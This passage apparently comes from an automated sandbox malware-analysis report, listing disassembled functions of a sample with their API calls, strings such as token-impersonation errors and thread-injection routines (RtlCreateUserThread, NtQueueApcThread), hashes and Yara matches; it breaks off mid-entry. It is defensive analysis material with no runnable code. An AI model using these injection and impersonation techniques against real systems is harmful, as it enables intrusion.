                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                        • String ID:
                        • API String ID: 1445889803-0
                        • Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                        • Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
                        • Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                        • Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708
                        Function 00D0A5EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00D0A5FD
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D0A5F5
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno_errno
                        • String ID:
                        • API String ID: 2964073243-0
                        • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                        • Instruction ID: 160babfe0ee68eeb78bec2b9eab9a55bb869375d8103608889068f3e66a12d26
                        • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                        • Instruction Fuzzy Hash: 7FF0F072A01B0485EF09AB68C89132C6271DBA1B76FE94301D63E0B3E1CB3D84428732
                        Function 00A599EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00A599FD
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A599F5
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno_errno
                        • String ID:
                        • API String ID: 2964073243-0
                        • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                        • Instruction ID: 883d0679f1d1919d5d51651128383e97b4ac570ec3fedf5c2d628f1aae25d4a3
                        • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                        • Instruction Fuzzy Hash: B4F06DB2721A4489EF052B68C99137D6661BBA1BB3F958305DF290B3D1CB78484A8721
                        Function 00A45228 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116stringCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00A453EC: malloc.LIBCMT ref: 00A45408
                        • strrchr.LIBCMT ref: 00A452ED
                        • _snprintf.LIBCMT ref: 00A4539B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintfmallocstrrchr
                        • String ID: Failed to impersonate token: %d$t permissions in process: %d
                        • API String ID: 3587327836-1492073275
                        • Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                        • Instruction ID: 0e66c91728b7f866e154fee2e8dee9ef1688cee72c739c1c98066314011f7c3e
                        • Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                        • Instruction Fuzzy Hash: FE419125B0478086DB04FB22BA1576EABA2F7CAFD4F484124AE5A4B75ADF3CC442C701
                        Function 00CF2818 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93sleeppipeCOMMON
                        Download Yara Rule
                        APIs
                        • CreatePipe.KERNEL32 ref: 00CF28A3
                        • GetStartupInfoA.KERNEL32 ref: 00CF28AD
                        • Sleep.KERNEL32 ref: 00CF28F4
                          • Part of subcall function 00CF48D8: GetTickCount.KERNEL32 ref: 00CF48F1
                          • Part of subcall function 00CF48D8: GetTickCount.KERNEL32 ref: 00CF4932
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$CreateInfoPipeSleepStartup
                        • String ID: h
                        • API String ID: 1809008225-2439710439
                        • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                        • Instruction ID: 6a2b9923359f5f7a9f5fd177bc750d911f6df214ee824f1a38781dbd25da4be2
                        • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                        • Instruction Fuzzy Hash: BB419A32604B889AD750CF65E84079EB7B5F788798F10421AEF9C53B68DF78DA46CB40
                        Function 00CFE1D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AccountInformationLookupToken_snprintf
                        • String ID: %s\%s
                        • API String ID: 2107350476-4073750446
                        • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                        • Instruction ID: c768fd1e3300265dfa509d5841e001c23f12ab42e7ddc82522b596c64fc95980
                        • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                        • Instruction Fuzzy Hash: 56212F32204FC596DB24CF62E8447EA6769F788B88F548126EA8D57B58DF79C20AC740
                        Function 00CF4224 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: RtlCreateUserThread$ntdll.dll
                        • API String ID: 1646373207-2935400652
                        • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                        • Instruction ID: aa12519914f8f143ee0efd3ffdb821d0d0099dbe1cceab9a09269643c7e491f1
                        • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                        • Instruction Fuzzy Hash: 84016D32304B9492DB20CF51F88479AB7A8F798B80F99813AEA9D43B14DF38C565C700
                        Function 00CF3C0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: NtQueueApcThread$ntdll
                        • API String ID: 1646373207-1374908105
                        • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                        • Instruction ID: 9e5c13fae2f2fd299b9897a0f39107e70a46ce60df2157ed6b43f7d9027b229d
                        • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                        • Instruction Fuzzy Hash: 2301D635310B8192DB008B52F84436AB360F799FD0F544626DF6943B18DF38C6618300
                        Function 00CF0C64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: IsWow64Process$kernel32
                        • API String ID: 1646373207-3789238822
                        • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                        • Instruction ID: 93b8eb6bf33ebe620af8d9441cf9e9f840e95c896964fc374a8860354053fbce
                        • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                        • Instruction Fuzzy Hash: 0CE0267032170592FF09CB95F8903B66320EB88BC0F481012DA9B06361EF3CC2A9C720
                        Function 00CF20E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: Wow64RevertWow64FsRedirection$kernel32
                        • API String ID: 1646373207-3900151262
                        • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                        • Instruction ID: c1c5fbff0d8a7f656df8c83eb155b4e71726b0940a7ccc7d722dd0e4e648fbaa
                        • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                        • Instruction Fuzzy Hash: 38D09E60751609A1FE199BD1B8557B45350AB5AB41F481026892A06360EE2DC6AAC324
                        Function 00CF20AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: Wow64DisableWow64FsRedirection$kernel32
                        • API String ID: 1646373207-736604160
                        • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                        • Instruction ID: 4f0676fb3b280bff73f3ec7e48106454d01ea0fa22108df8f19c892571d5d111
                        • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                        • Instruction Fuzzy Hash: E9D0C770752609A1FE159BD1FC557F56350AB59B51F8C1027892E06360EE2DC6EBC334
                        Function 00CFBFC0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                        • Instruction ID: 79db1db834145f2f75f0045afc2ad07200c4c47ab65629c19ef0ba2e9ba9dbc8
                        • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                        • Instruction Fuzzy Hash: B451F13634274CC6EB58CF59EAC537873A1F3A8B54F24812ADA294B365CB38C452CB61
                        Function 00A4B3C0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                        • Instruction ID: 0b0cf0ab0738e023d968041074f436d7f7855b7fb0478d6c9a0789a6ed43815f
                        • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                        • Instruction Fuzzy Hash: 8951E67A715740CBD714CF29E94576873B0F799BA5F24812DDA0E4B361DB38C841CB62
                        Function 00A42170 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00A425F4: strchr.LIBCMT ref: 00A4262E
                          • Part of subcall function 00A425F4: strchr.LIBCMT ref: 00A4264C
                          • Part of subcall function 00A425F4: malloc.LIBCMT ref: 00A42664
                          • Part of subcall function 00A425F4: malloc.LIBCMT ref: 00A42671
                          • Part of subcall function 00A425F4: rand.LIBCMT ref: 00A4273D
                        • strchr.LIBCMT ref: 00A421D6
                        • _snprintf.LIBCMT ref: 00A4220C
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                        • _snprintf.LIBCMT ref: 00A42223
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                        • String ID: not create token: %d
                        • API String ID: 1095232423-2272930512
                        • Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                        • Instruction ID: eccd5c040c1aa25d84091155aad8d1bb1154b9019914153fc50e0832bd24cf54
                        • Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                        • Instruction Fuzzy Hash: 0341916A604E8091EB11DF2AD2453E8A3B0FFD8B95F485512EF4867B21EF34D1B2C340
                        Function 00CF4A04 Relevance: 6.1, APIs: 4, Instructions: 80synchronizationCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CF4A45
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • htonl.WS2_32 ref: 00CF4A5B
                          • Part of subcall function 00CF4C44: PeekNamedPipe.KERNEL32 ref: 00CF4C7C
                        • WaitForSingleObject.KERNEL32 ref: 00CF4AB6
                        • free.LIBCMT ref: 00CF4AF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                        • String ID:
                        • API String ID: 2495333179-0
                        • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                        • Instruction ID: 877cbfa982efca5e472f2526ce7d47b7430f87bc956f4c0e1c92402b5dd414e6
                        • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                        • Instruction Fuzzy Hash: F921E136300A4881DBA8DF62E58033B73A9FB88B98F094515DF654B718DB38C9D2D34A
                        Function 00CFC230 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _time64.LIBCMT ref: 00CFC254
                          • Part of subcall function 00D0145C: GetSystemTimeAsFileTime.KERNEL32 ref: 00D0146A
                          • Part of subcall function 00D0044C: _getptd.LIBCMT ref: 00D00454
                        • malloc.LIBCMT ref: 00CFC29C
                        • strtok.LIBCMT ref: 00CFC300
                        • strtok.LIBCMT ref: 00CFC311
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Timestrtok$FileSystem_getptd_time64malloc
                        • String ID:
                        • API String ID: 460628555-0
                        • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                        • Instruction ID: 470ec5b1ea0da33478c463f2c2aa713a192373969e667419f6903c4e7e4507c5
                        • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                        • Instruction Fuzzy Hash: 1021B2B6B10B9881DB44DF92E18866D77A8F798BE4B164226EF6A43781CF34C542C780
                        Function 00CE10D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: clock
                        • String ID:
                        • API String ID: 3195780754-0
                        • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                        • Instruction ID: 690c8108c55fc787c61a19585598e0f092791f8757d2bf538924a1b5b4217cb8
                        • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                        • Instruction Fuzzy Hash: 72112B336047C549A771EEA7688062FF650F7847D4F1D0535EF6853705E975C991C720
                        Function 00D0F5D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D0F5FC
                          • Part of subcall function 00D01600: _getptd.LIBCMT ref: 00D01616
                          • Part of subcall function 00D01600: __updatetlocinfo.LIBCMT ref: 00D0164B
                          • Part of subcall function 00D01600: __updatetmbcinfo.LIBCMT ref: 00D01672
                        • _errno.LIBCMT ref: 00D0F608
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D0F613
                        • strchr.LIBCMT ref: 00D0F629
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                        • String ID:
                        • API String ID: 4151157258-0
                        • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                        • Instruction ID: f53e7cb233a7d4344d4fcdc7d63083dfa4a666fa55ab6c943955384bf1478fa1
                        • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                        • Instruction Fuzzy Hash: E21104626082E481CB359B25905033EA690E384FD4BBC4135EADE4BFE5DA6EC442C730
                        Function 00A5E9D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A5E9FC
                          • Part of subcall function 00A50A00: _getptd.LIBCMT ref: 00A50A16
                          • Part of subcall function 00A50A00: __updatetlocinfo.LIBCMT ref: 00A50A4B
                          • Part of subcall function 00A50A00: __updatetmbcinfo.LIBCMT ref: 00A50A72
                        • _errno.LIBCMT ref: 00A5EA08
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A5EA13
                        • strchr.LIBCMT ref: 00A5EA29
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                        • String ID:
                        • API String ID: 4151157258-0
                        • Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                        • Instruction ID: ecda77193b7353e2196333aefe108c0c52390075b54b737de9864c20c102daaa
                        • Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                        • Instruction Fuzzy Hash: 19110463A082E441DB29D735905023EBAA0F385BD7B5C8125FFD60BA55DA3CC749CB50
                        Function 00A304D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: clock
                        • String ID:
                        • API String ID: 3195780754-0
                        • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                        • Instruction ID: f7bcda0d092cdcee3feba0f7c45e2f24b3dec7c1386630aff635bf29a8a9c38d
                        • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                        • Instruction Fuzzy Hash: 03116633204788899738EFA6B59092BF690FB883E4F199035FF8543701EAB4C886CF00
                        Function 00CFEF5C Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON
                        Download Yara Rule
                        APIs
                        • accept.WS2_32 ref: 00CFEF71
                        • send.WS2_32 ref: 00CFEFAF
                        • send.WS2_32 ref: 00CFEFC3
                        • closesocket.WS2_32 ref: 00CFEFD4
                          • Part of subcall function 00CFF098: closesocket.WS2_32 ref: 00CFF0A4
                          • Part of subcall function 00CFF098: free.LIBCMT ref: 00CFF0AE
                          • Part of subcall function 00CFF098: free.LIBCMT ref: 00CFF0B7
                          • Part of subcall function 00CFF098: free.LIBCMT ref: 00CFF0C0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$closesocketsend$accept
                        • String ID:
                        • API String ID: 47150829-0
                        • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                        • Instruction ID: cc288ea08d1cf94697a08679dfe112c93369c78d8f55f80f826242d8f3a0050a
                        • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                        • Instruction Fuzzy Hash: 4401A23530494481EBA49B77F9A5B3D2322EB8DFF4F049212DF2607B95CE39C0918B41
                        Function 00CF53EC Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$NamedPeekPipeSleep
                        • String ID:
                        • API String ID: 1593283408-0
                        • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                        • Instruction ID: 7228bee35dcc6c38ce02a5cc6756511855cd889eee96dad63760c6e5c8abb8e3
                        • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                        • Instruction Fuzzy Hash: 2AF02832314E50D2E710CB65F80032AB7A1F784B81F244021DF9843A34DF3DC4D18B06
                        Function 00CF48D8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$NamedPeekPipeSleep
                        • String ID:
                        • API String ID: 1593283408-0
                        • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                        • Instruction ID: f13929b48e79b5734cd14f9d457f6b4cc44e562d4856b8d6427178fb93264005
                        • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                        • Instruction Fuzzy Hash: 39F0FF32714A4092E3208B55F84033BB369F785B90F384120EB8942A78DF7EC9918B08
                        Function 00CF76F0 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMON
                        Download Yara Rule
                        APIs
                        • InitializeProcThreadAttributeList.KERNEL32 ref: 00CF770E
                        • GetProcessHeap.KERNEL32 ref: 00CF7714
                        • HeapAlloc.KERNEL32 ref: 00CF7724
                        • InitializeProcThreadAttributeList.KERNEL32 ref: 00CF773F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                        • String ID:
                        • API String ID: 1212816094-0
                        • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                        • Instruction ID: fa8e01b2b425fad57215ce87d0542a78fb1813b5a85e2280ee1c1116b6a5b548
                        • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                        • Instruction Fuzzy Hash: 98F09636724B4492DB95DF75B4507BA63A0EB88B90F58542BBB0B42714DE3DC4A58A10
                        Function 00CFF098 Relevance: 6.0, APIs: 4, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        • closesocket.WS2_32 ref: 00CFF0A4
                        • free.LIBCMT ref: 00CFF0AE
                          • Part of subcall function 00CFF244: HeapFree.KERNEL32 ref: 00CFF25A
                          • Part of subcall function 00CFF244: _errno.LIBCMT ref: 00CFF264
                          • Part of subcall function 00CFF244: GetLastError.KERNEL32 ref: 00CFF26C
                        • free.LIBCMT ref: 00CFF0B7
                        • free.LIBCMT ref: 00CFF0C0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                        • String ID:
                        • API String ID: 1525665891-0
                        • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
